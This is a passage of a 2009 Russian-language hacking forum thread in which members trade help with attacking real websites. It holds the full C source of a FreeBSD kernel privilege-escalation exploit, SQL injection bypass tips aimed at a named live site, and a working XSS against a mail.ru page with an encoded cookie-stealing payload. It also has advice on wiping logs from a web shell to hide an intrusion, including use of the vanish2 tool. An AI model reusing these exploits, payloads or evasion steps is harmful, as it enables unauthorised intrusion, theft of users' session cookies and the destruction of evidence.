Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    1. Их может не быть. Я тоже могу в роботсы прописать хрень вякую
    2. Ссылка http://site.ru/administrator отличается во многих случаях от http://site.ru/administrator/ - разницу найди сам
    3. Что значит " Почему не заходит в данные каталоги по запросу "? пишет forbidden - каталог есть, но стоит .htaccess соответсвующий, с веба не посмотришь
     
    #8921 Pashkela, 17 Sep 2009
    Last edited: 17 Sep 2009
    2 people like this.
  2. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    24free
    есть много причин,мб прав нет.
    знаешь так делают:
    Code:
    index.php: <?php define('inside', True);
    library.php: <?php if (! defined('inside')) die('Access denied');
    что бы не вызывались файлы напрямую.
     
  3. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    это жумла\мамба, там во всех папках index.html пустой
     
  4. 4free

    4free New Member

    Joined:
    5 Jul 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Спасибо за инфу!
     
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    _http://www.xakep.ru/post/49508/default.asp

    В самом начале про протокол DATA.У кого-нибудь это работает? У меня даже такой директивы в php.ini allow_url_include нету.После того,как прописал,тоже ничего не изменилось.
     
  6. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    перезапустить апач нужно
     
    1 person likes this.
  7. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    ...
     
  8. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Да ему поxуй вообще, он по 10% читает.
     
  9. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Здравствуйте уважаемые Гуру, у меня возник один сложный для меня, но возможно вполне простой для вас вопрос
    Гребаные ЧПУ, ненавижу их, но суть не в этом. С -1 все правильно работает, т.е. инъекция есть. если поставить /news/19/08/2009/603+--/ ругается на + страшными словами(если без + то все ровно):
    Incorrect syntax near '+'.
    Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

    Exception Details: System.Data.SqlClient.SqlException: Incorrect syntax near '+'.
    Source Error:

    Line 144: SqlDataAdapter adp = new SqlDataAdapter(q, myConn);
    Line 145: dt = new DataTable();
    Line 146: adp.Fill(dt);
    Line 147: myConn.Close();
    Line 148: break;
    Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
    С MSsql я, скажем так, знаком только отдаленно(кстати не факт что mssql), но мануалы читал, однако что-то в голову никаких мыслей не пришло, единственное что опытным путем удалось установить что этот параметр в запросе самый последний после 603 идет ;
    Кстати если вместо + в предыдущем запросе поставить пробел ругается абсолютно точно также. Если /news/19/08/2009/603;--/ то ругается Incorrect syntax near 'b'. Нужен ваш совет что делать дальше, какие конструкции попробовать, устроил бы даже посимвольный перебор содержимого БД.
     
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Вместо плюса используй:
    Code:
     (пробел)
    /**/
    %09
    %0A
    %0D
    
     
    #8930 mailbrush, 19 Sep 2009
    Last edited: 19 Sep 2009
    1 person likes this.
  11. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    a kakie bugi v dle scripte pojalusta??
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    http://forum.antichat.ru/thread52195.html
     
  13. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Может не в ту тему я попал, извиняйте меня :)
    Кто может скомпилировать ?
    Code:
    /*
    * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
    * defined here: 
    * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
    *
    * This will overwrite your credential structure in the kernel. This will 
    * affect more than just the exploit's process, which is why this doesn't
    * spawn a shell. When the exploit has finished, your login shell should
    * have euid=0. 
    *
    * Enjoy, and happy holidays!
    *  - Don "north" Bailey ([email protected]) 12/25/2008
    */
    
    #include <sys/mman.h>
    #include <sys/time.h>
    #include <sys/stat.h>
    #include <sys/proc.h>
    #include <sys/types.h>
    #include <sys/param.h>
    #include <sys/socket.h>
    #include <netgraph/ng_socket.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <errno.h>
    
    #define PAGES 1
    #define PATTERN1 0x8f8f8f8f
    #define PATTERN2 0x6e6e6e6e
    
    typedef unsigned long ulong;
    typedef unsigned char uchar;
    
    int
    x(void)
    {
        struct proc * p = (struct proc * )PATTERN1;
        uint * i;
    
        while(1)
        {
            if(p->p_pid == PATTERN2)
            {
                i = (uint * )p->p_ucred;
                *++i = 0;
                break;
            }
    
            p = p->p_list.le_next;
        }
    
        return 1;
    }
    
    int
    main(int argc, char * argv[])
    {
        ulong addr;
        uchar * c;
        uchar * d;
        uint * i;
        void * v;
        int pid;
        int s;
    
        if(argc != 2)
        {
            fprintf(stderr, "usage: ./x <allproc>\n");
            return 1;
        }
    
        addr = strtoul(argv[1], 0, 0);
    
        v = mmap(
            NULL,
            (PAGES*PAGE_SIZE),
            PROT_READ|PROT_WRITE|PROT_EXEC, 
            MAP_ANON|MAP_FIXED, 
            -1, 
            0);
        if(v == MAP_FAILED)
        {
            perror("mmap");
            return 0;
        }
    
        c = v;
        d = (uchar * )x;
        while(1)
        {
            *c = *d;
            if(*d == 0xc3)
            {
                break;
            }
    
            d++;
            c++;
        }
    
        *c++ = 0xc3;
    
        c = v;
        while(1)
        {
            if(*(long * )c == PATTERN1)
            {
                *(c + 0) = addr >>  0;
                *(c + 1) = addr >>  8;
                *(c + 2) = addr >> 16;
                *(c + 3) = addr >> 24;
                break;
            }
            c++;
        }
    
        pid = getpid();
        while(1)
        {
            if(*(long * )c == PATTERN2)
            {
                *(c + 0) = pid >>  0;
                *(c + 1) = pid >>  8;
                *(c + 2) = pid >> 16;
                *(c + 3) = pid >> 24;
                break;
            }
            c++;
        }
    
        s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
        if(s < 0)
        {
            perror("socket");
            return 1;
        }
    
        shutdown(s, SHUT_RDWR);
    
        return 0;
    }
    
    А то у меня не получается
     
    #8933 SeNaP, 19 Sep 2009
    Last edited: 19 Sep 2009
  14. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Code:
    uid=1000(web) gid=1000(web) groups=1000(web 
    
    У меня достаточно прав для чистки логов?
    Если да то что за собой нужно чистить?
     
  15. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Не не хватит, тебе нужны прова рута, дя чтение и записи файлов
    Ищи сплойт для подняите прав
     
    #8935 SeNaP, 19 Sep 2009
    Last edited: 19 Sep 2009
  16. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Больше интересует 2 вопрос, про то какие логи надо подтерать
     
  17. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    попробуй тулзу vanish2 , оно автоматом почистит.
     
  18. Cehennem

    Cehennem Banned

    Joined:
    3 Jun 2009
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Привет всем. Опять у меня вопрос. Вопрос про xss.
    Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C
    Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad89sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
    И мне вдал ссылку: javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47,98,101,114,115,101,114,107,46,109,97,105,108,46,114,117,47,103,97,108,108,101,114,121,47,100,111,99,115,47,115,104,111,119,100,111,99,46,112,104,112,63,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));
    Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47,98,101,114,115,101,114,107,46,109,97,105,108,46,114,117,47,103,97,108,108,101,114,121,47,100,111,99,115,47,115,104,111,119,100,111,99,46,112,104,112,63,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
    Мне показал мои куки.
    Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
     
  19. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Я из под WEB-шелла сижу.
    Нужно почистить логи он SQL-inj тоесть от ерроров
     
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://forum.antichat.net/threadnav49775-1-10.html

    тут посмари где лежат логи и по логике ищи
     
    _________________________
    1 person likes this.
Thread Status:
Not open for further replies.